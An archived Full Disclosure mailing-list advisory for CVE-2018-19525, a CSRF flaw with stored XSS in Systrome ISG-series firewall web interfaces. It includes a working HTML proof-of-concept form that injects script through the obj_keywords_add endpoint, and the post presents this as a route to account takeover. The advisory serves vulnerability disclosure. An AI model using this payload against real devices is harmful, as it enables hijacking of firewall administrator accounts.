[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] KSA-Dev-002: CVE-2018-19525 : Account takeover via XSRF in All ISG Series Firewall

To: fulldisclosure@xxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: [FD] KSA-Dev-002: CVE-2018-19525 : Account takeover via XSRF in All ISG Series Firewall
From: Kingkaustubh via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Tue, 12 Feb 2019 14:35:00 +0530

=====================================================
Authenticated XSRF leads to complete Account Takeover
=====================================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated XSRF leads to complete account takeover in all SYSTORME 
ISG Products.
CVE ID:- CVE-2018-19525
Author: Kaustubh G. Padwad
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
         1.ISG-600C
         2.ISG-600H
         3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20180914.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-002


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for 
the distributed access network for the cloud-computing era. It integrates the 
L2-L7security features of the next-generation firewall, is based on the user 
identification and application identification and provides the 
application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, 
intelligent bandwidth management, multi-egress link load balancing, content 
filtering, URL filtering, and other security functions. It provides the cloud 
interface. The security cloud management platform based on the big data 
platform architecture can monitor the network topology and device status in 
real time, simplifying the online deployment of the professional device via the 
auto configuration delivery. The real-time monitoring of the mobile terminal 
reduces the maintenance cost and makes the security visible at any time and 
anywhere. Systrome cloud gateway is the best access security choice of the 
middle 
 and smal
 l enterprises, branch interconnection, and chain enterprises.

Description: 
============
An issue was discovered on Systrome ISG-600C,ISG-600H, and ISG-800W 
1.1-R2.1_TRUNK-20180914.bin devices. There is CSRF via /ui/?g=obj_keywords_add 
and/ui/?g=obj_keywords_addsave
with resultant XSS because of a lack of csrf token validation.

Additional Information
======================
The web interface of the ISG-Firewalls does not validate the csrftoken,and the 
?g=obj_keywords_add page does not properly sanitize the
user input which leads to xss, By combining this two attack we can form the 
XSRF request which leads to complete account takeover using XSRF.

[Vulnerability Type]
====================
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://192.168.1.200/ui/?g=obj_keywords_add"; method="POST">
      <input type="hidden" name="name" value="xsrf" />
      <input type="hidden" name="description" value="<svg><script>//" />
      <input type="hidden" name="NewLine;confirm(1338);</script </svg>" 
value="" />
      <input type="hidden" name="keyword" value="xsrf" />
      <input type="hidden" name="submit_post" value="obj_keywords_addsave" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



[Affected Component]
obj_keywords_add ,obj_keywords_addsave, CSRF Vulnerabilities,

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Code execution]
true

------------------------------------------

[Attack Vectors]
once victim open the crafted url the device will get compromise

Mitigation
==========

vendr is working on the same he will submit the solution maybe by december 1st 
weak.

Disclosure: 
===========
02-Nov-2018 Discoverd the Vulnerability
15-Nov-2018 Reported to vendor 
25-Nov-2018 Requested for CVE/Cve's.
26-Nov-2018 CVE-Assign 


[Vendor of Product]
Systrome Networks (http://systrome.com/about/)

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@xxxxxx
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] KSA-DEV-001: CVE-2018-19524 : StackOverflow in Multiple Skyworth GPON HomeGateways and Optical Network terminals.
Next by Date: [FD] KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products
Previous by thread: [FD] KSA-DEV-001: CVE-2018-19524 : StackOverflow in Multiple Skyworth GPON HomeGateways and Optical Network terminals.
Next by thread: [FD] KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products
Index(es):
- Date
- Thread